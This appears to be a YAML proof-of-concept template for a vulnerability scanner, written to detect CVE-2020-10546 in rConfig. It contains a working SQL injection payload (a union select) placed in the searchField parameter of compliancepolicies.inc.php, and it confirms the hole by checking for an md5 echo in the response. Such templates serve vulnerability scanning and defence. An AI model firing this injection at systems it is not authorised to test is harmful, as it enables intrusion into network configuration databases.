name: poc-yaml-rconfig-cve-2020-10546
binding: fa701afe-7f0e-492d-a8c9-752178edd3fe
manual: true
detail:
    author: 2husky
    links:
        - https://theguly.github.io/2020/09/rconfig-3.9.4-multiple-vulnerabilities/
    vulnerability:
        id: CT-84097
        level: critical
transport: http
set:
    f1: randomLowercase(5)
rules:
    r0:
        request:
            cache: true
            method: GET
            path: /compliancepolicies.inc.php?search=True&searchColumn=policyName&searchOption=contains&searchField=antani'+union+select+md5('{{f1}}'),NULL,NULL+--+
            follow_redirects: false
        expression: response.status == 200 && response.body.bcontains(bytes(md5(f1)))
expression: r0()
